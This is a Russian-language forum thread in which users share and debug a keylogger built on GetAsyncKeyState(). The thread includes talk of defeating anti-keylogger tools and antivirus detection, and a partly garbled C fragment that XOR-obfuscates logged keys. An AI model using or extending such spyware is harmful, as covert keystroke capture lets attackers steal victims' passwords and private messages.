Искал способ создания Кейлогера с помощью GetAsyncKeyState(), т.к. стандартный через хуки неудобен тем что нужно "таскать" за собой ДЛЛ, а хотелось чтоб можно было запустить отдельный поток. Раз хочется можно и попытаться, в результате написал несколько прог: akl - собственно логер akl_analyze - анализирует логи get_lang_id - нужна для получения кода языка. Сейчас перехватываются клавиши в русской и английской раскладке. Что вышло смотреть в аттаче(там src+bin). 1747654777__src_bin.zip
Классно !!! Только долго при запуске не отвечает, (курсор в виде часов), из-зф того что файл сразу создается. А так - Rulezz!!!
Чтобы не таскать DLL'ку можно ставить хук типа WH_JOURNALRECORD, который не обязательно должен жить в DLL'ке. Правда это получится уже не новый вид кейлоггера .
Чего-то нового не видно, есть такой антикейлоггер, на www.bezpeka.biz смотри, если твой кейлоггер работает совместно с ним, то значит действительно новый тип - ни в коем случае не расцениайте это как рекламу.
Я тестил, его на PGP(где защита от Хуков) все перехватывает,насчет www.bezpeka.biz. В моем кейлогере используется тот способ который применяется в играх, так что думаю будет работать если тока они не фильтруют вызовы к GetKeyboardLayout.
За этим "новым видом" уже Касперский начал следить , сегодня KAV в архивчике обнаружил Trojan-Spy.Win32.KeyLogger.ct
Найден баг: во всех этих строчках: if(i==VK_BACK) dump(h_file,"",3); //~ else if(i==VK_TAB) //~ dump(h_file,"[T]",3); else if(i==VK_RETURN) dump(h_file,"[E]",3); else if(i==VK_DELETE) dump(h_file,"[D]",3); //~ else if(i==VK_UP) //~ dump(h_file,"",3); //~ else if(i==VK_DOWN) //~ dump(h_file,"[d]",3); //~ else if(i==VK_RIGHT) //~ dump(h_file,"[r]",3); //~ else if(i==VK_LEFT) //~ dump(h_file,"[l]",3); т.к. в процедуре dump, второй параметр ксорится то получается что ксорится константа и через раз выдает нормально/хренова Пример решения проблемы: Заменить: if(i==VK_BACK) dump(h_file,"",3); На: if(i==VK_BACK) { key=(int)''; // ** dump(h_file,(char)&key,3); } ** - зависит от компилера, в каком порядке он представляет данные. _95681946__src_bin_v1.1.zip
намба 1 посмотри на дату поста намба 2 информация устаревает быстрее,чем ты ты можешь себе представить намба 3 в аттаче пример просто консольной проги показывающей скан-код клавиши,доработанной и основанной на этом методе. Код (Text):
